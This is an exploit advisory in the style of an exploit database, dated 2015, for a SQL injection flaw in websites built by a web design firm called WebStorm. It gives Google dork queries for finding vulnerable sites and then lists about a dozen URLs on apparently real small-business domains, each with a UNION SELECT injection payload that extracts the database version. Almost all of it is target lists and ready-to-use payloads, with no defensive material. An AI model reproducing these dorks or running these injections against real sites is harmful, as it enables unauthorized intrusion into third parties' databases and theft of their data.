###################### # Exploit Title : WebStorm Web Design SQL Injection Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.webstorm.ca # Google Dork 1 : "Web Design and Hosting by WebStorm" inurl:listing_detail.php?id= # Google Dork 2 : "Web Design and Hosting by WebStorm" inurl:php?id= # Date: 2015-08-03 # Tested On : Win 8 / Mozilla Firefox # ###################### # # Examples and Explanations : # # http://www.maconcoXnstruction.ca/listing_detail.php?id=-70' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--+ # http://www.danielleXbeitz.com/listing_detail.php?id=-210' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--+ # http://www.cabincXountry.com/listing_detail.php?id=-735' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97--+ # http://www.allreaXlestatematters.ca/listing_detail.php?id=-290' /*!50000UNION*/ SELECT 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98--+ # http://www.edmXonton4real.com/listing_detail.php?id=-76' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--+ # http://www.bclXands.ca/listing_detail.php?id=-190' /*!50000UNION*/ SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119--+ # http://www.richdalehXomes.com/listing_detail.php?id=-4' /*!50000UNION*/ SELECT 1,2,3,4,5,version(),7,8,9,10--+ # http://www.okanagXanclinicaltrials.com/psychiatry-column-article-detail.php?id=-395' /*!50000UNION*/ SELECT 1,version(),3,4--+ # http://www.classicXautobodyrepairs.com/listing_detail.php?id=-12' /*!50000UNION*/ SELECT 1,2,3,4,5,6,version(),8,9,10,11--+ # http://www.valhaXlco.com/wood-stain-news-detail.php?id=-13' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8--+ # http://www.solidsuperstore.ca/listing_detail.php?id=-189%27%20/*!50000UNION*/%20SELECT%201,2,3,4,5,version%28%29,7,8,9--+ # http://www.taylorprotraiXning.com/course_detail.php?id=-26%27%20/*!50000UNION*/%20SELECT%201,2,3,4,5,6,version%28%29,8,9,10,11,12--+ # # And ... # ###################### # discovered by : Naji ######################